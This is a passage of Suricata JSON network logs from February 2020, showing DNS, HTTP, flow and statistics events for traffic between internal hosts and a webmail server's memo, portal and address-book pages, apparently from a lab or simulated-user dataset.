Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/mail.spiral.com\/mnemo\/list.php","length":20},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":215,"tx_id":1}} 
{"timestamp":"2020-02-29T00:18:22.255851+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18162,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:22.365114+0000","flow_id":773543705896811,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59659,"proto":"UDP","dns":{"type":"answer","id":18162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:22.471951+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34874,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341}} 
{"timestamp":"2020-02-29T00:18:25.000682+0000","flow_id":780334029631261,"event_type":"flow","src_ip":"192.168.10.122","src_port":36750,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:24.749341+0000","end":"2020-02-29T00:13:24.857976+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:27.000505+0000","flow_id":607027817694435,"event_type":"flow","src_ip":"192.168.10.130","src_port":34862,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":25,"bytes_toserver":2523,"bytes_toclient":23669,"start":"2020-02-29T00:16:49.869603+0000","end":"2020-02-29T00:17:26.378585+0000","age":37,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:27.477985+0000","flow_id":1633039675901026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34874,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/list.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/memo.php?actionID=add_memo","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5341},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/list.php","state":"CLOSED","stored":false,"size":25658,"tx_id":2}} 
{"timestamp":"2020-02-29T00:18:28.000172+0000","event_type":"stats","stats":{"uptime":14760,"capture":{"kernel_packets":136522,"kernel_drops":0},"decoder":{"pkts":136536,"bytes":93805419,"invalid":192,"ipv4":135005,"ipv6":10,"ethernet":136536,"raw":0,"null":0,"sll":0,"tcp":129572,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7094176},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2791,"new_pruned":17,"est_pruned":2447,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19511,"memcap_state":0,"memcap_global":0},"http":{"memuse":35606,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:29.000745+0000","flow_id":2225289892430090,"event_type":"flow","src_ip":"192.168.10.81","src_port":52768,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":16,"bytes_toserver":2090,"bytes_toclient":15483,"start":"2020-02-29T00:17:19.098570+0000","end":"2020-02-29T00:17:28.722052+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:32.000589+0000","flow_id":1353815243338707,"event_type":"flow","src_ip":"192.168.10.122","src_port":42553,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.570323+0000","end":"2020-02-29T00:13:31.678579+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:32.000791+0000","flow_id":400710460705573,"event_type":"flow","src_ip":"192.168.10.122","src_port":45826,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:31.396069+0000","end":"2020-02-29T00:13:31.504125+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:18:33.000326+0000","flow_id":1579541559988013,"event_type":"flow","src_ip":"192.168.10.130","src_port":34866,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":9,"pkts_toclient":12,"bytes_toserver":1099,"bytes_toclient":9575,"start":"2020-02-29T00:17:27.151341+0000","end":"2020-02-29T00:17:32.580593+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:18:35.000167+0000","event_type":"stats","stats":{"uptime":14767,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10002,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2793,"new_pruned":
17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:42.000226+0000","event_type":"stats","stats":{"uptime":14774,"capture":{"kernel_packets":136534,"kernel_drops":0},"decoder":{"pkts":136538,"bytes":93805551,"invalid":192,"ipv4":135007,"ipv6":10,"ethernet":136538,"raw":0,"null":0,"sll":0,"tcp":129574,"udp":5226,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092736},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2810,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2826,"synack":2817,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1847,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2392,"failed_udp":112},"tx":{"http":4718,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2472}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2450,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18849,"memcap_state":0,"memcap
_global":0},"http":{"memuse":35526,"memcap":0}}} {"timestamp":"2020-02-29T00:18:43.889571+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49631,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15827,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:43.998032+0000","flow_id":110173123482339,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49631,"proto":"UDP","dns":{"type":"answer","id":15827,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:44.564099+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52774,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202}} {"timestamp":"2020-02-29T00:18:47.000298+0000","flow_id":302931236246879,"event_type":"flow","src_ip":"192.168.10.122","src_port":36289,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:46.283999+0000","end":"2020-02-29T00:13:46.392737+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:18:49.000216+0000","event_type":"stats","stats":{"uptime":14781,"capture":{"kernel_packets":136545,"kernel_drops":0},"decoder":{"pkts":136557,"bytes":93815974,"invalid":192,"ipv4":135026,"ipv6":10,"ethernet":136557,"raw":0,"null":0,"sll":0,"tcp":129591,"udp":5228,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2811,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2827,"synack":2818,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1848,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2393,"failed_udp":112},"tx":{"http":4719,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2473}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2451,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":121149,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:49.566853+0000","flow_id":1980751639961820,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52774,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8202},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":48903,"tx_id":0}} {"timestamp":"2020-02-29T00:18:51.102531+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52667,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31596,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:51.207491+0000","flow_id":1992764664025219,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52667,"proto":"UDP","dns":{"type":"answer","id":31596,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:51.299739+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34876,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608}} {"timestamp":"2020-02-29T00:18:52.000255+0000","flow_id":720204489272861,"event_type":"flow","src_ip":"192.168.10.122","src_port":37890,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:13:51.634397+0000","end":"2020-02-29T00:13:51.742601+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:54.000424+0000","flow_id":902968232767834,"event_type":"flow","src_ip":"192.168.10.122","src_port":38101,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:53.127322+0000","end":"2020-02-29T00:13:53.235775+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:18:55.950562+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35507,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":54231,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:18:56.000204+0000","event_type":"stats","stats":{"uptime":14788,"capture":{"kernel_packets":136566,"kernel_drops":0},"decoder":{"pkts":136580,"bytes":93823981,"invalid":192,"ipv4":135045,"ipv6":10,"ethernet":136580,"raw":0,"null":0,"sll":0,"tcp":129608,"udp":5230,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093024},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2812,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2828,"synack":2819,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1849,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2394,"failed_udp":112},"tx":{"http":4720,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2474}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2453,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18777,"memcap_state":0,"memcap_global":0},"http":{"memuse":53216,"memcap":0}}} 
{"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:18:56.058921+0000","flow_id":171140185030946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35507,"proto":"UDP","dns":{"type":"answer","id":54231,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:18:56.259004+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071}} {"timestamp":"2020-02-29T00:18:56.301097+0000","flow_id":2049226304089160,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34876,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/memo.php?actionID=add_memo","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5608},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/memo.php","state":"CLOSED","stored":false,"size":20700,"tx_id":0}} 
{"timestamp":"2020-02-29T00:18:58.000810+0000","flow_id":1485649266158063,"event_type":"flow","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:13:57.600559+0000","end":"2020-02-29T00:13:57.709068+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:19:00.241682+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7071},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":38215,"tx_id":0}} {"timestamp":"2020-02-29T00:19:00.250216+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38608,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":55762,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:00.358727+0000","flow_id":1273696944968040,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38608,"proto":"UDP","dns":{"type":"answer","id":55762,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:00.445730+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34878,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3984}} {"timestamp":"2020-02-29T00:19:03.000378+0000","event_type":"stats","stats":{"uptime":14795,"capture":{"kernel_packets":136608,"kernel_drops":0},"decoder":{"pkts":136618,"bytes":93839609,"invalid":192,"ipv4":135083,"ipv6":10,"ethernet":136618,"raw":0,"null":0,"sll":0,"tcp":129642,"udp":5234,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7093600},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2813,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2829,"synack":2820,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":146,"memuse":819200,"reassembly
_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1850,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":105,"dcerpc_udp":0,"dns_udp":2396,"failed_udp":112},"tx":{"http":4722,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2476}},"flow_mgr":{"closed_pruned":2794,"new_pruned":17,"est_pruned":2454,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18850,"memcap_state":0,"memcap_global":0},"http":{"memuse":52604,"memcap":0}}} {"timestamp":"2020-02-29T00:19:03.009191+0000","flow_id":1152402773196756,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34878,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 